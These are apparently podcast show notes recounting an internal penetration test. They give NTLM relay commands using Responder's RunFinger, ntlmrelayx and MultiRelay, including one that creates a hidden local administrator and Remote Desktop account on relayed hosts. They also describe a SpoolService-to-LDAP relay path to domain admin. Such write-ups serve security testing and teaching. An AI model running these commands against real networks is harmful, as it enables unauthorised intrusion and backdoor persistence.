7MS #372: Tales of Internal Pentest Pwnage - Part 5

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute

Today I share the (hopefully) exciting and fun conclusion to last week's episode about a tale of internal pentest pwnage! A few important notes from today's episode:

• Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this:

opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt

grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt

Source: Pwning internal networks automagically

• Ready to pass captured hashes from one host to another? Open responder.conf and turn SMB and HTTP to Off, then get Responder running in one window, and ntlmrelayx in another. Specifically, I like to use ntlmrelayx.py -tf targets.txt where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a -c to run a string of my choice. Check out this fun evil little nugget:

net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add 

So the full command would be:

ntlmrelayx.py -tf targets.txt -c 'net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add'

This will create a new user called ladmin1, add it to Administrators group and also to Remote Desktop Users (just in case).

• Want to be more sniper-focused in your hash-passing? Try the MultiRelay tool as part of the Responder kit. You can choose just a target IP and just specific usernames in hashes to pass. This site has some great examples, but here's an example with one target IP and just the domain administrator accounts from AD:

MultiRelay.py -t 10.0.0.5 -u Administrator brian_admin milton_admin spiderman_Admin

In the end, the relaying didn't work out for me, so I went into "phone a friend" mode and asked other testers for ideas. At this point I have to give a huge thank you to:

• Ryan Haus for his awesome series on penetration testing Active Directory as well as...
• Vincent Yiu for pointing me to this article which gave me the path to domain admin. I'll let you soak in that article as there's a lot of meat in it, but here's the attack path I followed:

Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server.

Happy testing!